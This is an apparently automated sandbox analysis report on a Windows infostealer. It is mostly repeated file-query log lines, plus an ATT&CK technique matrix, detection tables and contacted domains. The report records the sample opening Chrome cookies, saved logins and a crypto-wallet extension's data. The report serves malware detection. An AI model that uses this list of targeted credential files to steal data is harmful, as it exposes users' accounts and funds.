      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\pyexpat.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\_queue.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI60602 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeQueries volume information: C:\Users\user\Desktop\322pVOVprx.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD89B0 cpuid 0_2_00007FF6E5AD89B0
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5ABB580 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6E5ABB580
      Source: C:\Users\user\Desktop\322pVOVprx.exeCode function: 0_2_00007FF6E5AD4E20 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6E5AD4E20

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 322pVOVprx.exe PID: 6084, type: MEMORYSTR
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\Desktop\322pVOVprx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 322pVOVprx.exe PID: 6084, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation1
      DLL Side-Loading
      11
      Process Injection
      11
      Process Injection
      1
      OS Credential Dumping
      2
      System Time Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium11
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      LSASS Memory21
      Security Software Discovery
      Remote Desktop Protocol1
      Data from Local System
      Exfiltration Over Bluetooth1
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
      Obfuscated Files or Information
      Security Account Manager1
      Remote System Discovery
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
      Timestomp
      NTDS1
      System Network Configuration Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer14
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials22
      System Information Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      322pVOVprx.exe42%ReversingLabsWin64.Infostealer.Disco
      322pVOVprx.exe16%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD2.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD4.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_MD5.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA1.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA224.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA256.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA384.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA512.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_keccak.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_poly1305.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Math\_modexp.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_x25519.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Util\_strxor.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\VCRUNTIME140.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_asyncio.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_bz2.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_cffi_backend.cp311-win_amd64.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_ctypes.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_decimal.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_hashlib.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_lzma.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_multiprocessing.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_overlapped.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_queue.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_socket.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_sqlite3.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\_ssl.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\charset_normalizer\md.cp311-win_amd64.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\charset_normalizer\md__mypyc.cp311-win_amd64.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\libcrypto-1_1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\libffi-8.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\libssl-1_1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\pyexpat.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\python311.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\select.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\sqlite3.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI60602\unicodedata.pyd0%ReversingLabs
      No Antivirus matches
      SourceDetectionScannerLabelLink
      canary.discord.com0%VirustotalBrowse
      geolocation-db.com1%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://crl.dhimyotis.com/certignarootca.crl0%URL Reputationsafe
      https://wwww.certigna.fr/autorites/0%URL Reputationsafe
      http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%URL Reputationsafe
      http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html0%URL Reputationsafe
      https://w3c.github.io/html/sec-forms.html#multipart-form-data0%URL Reputationsafe
      https://ebay.com)z$0%Avira URL Cloudsafe
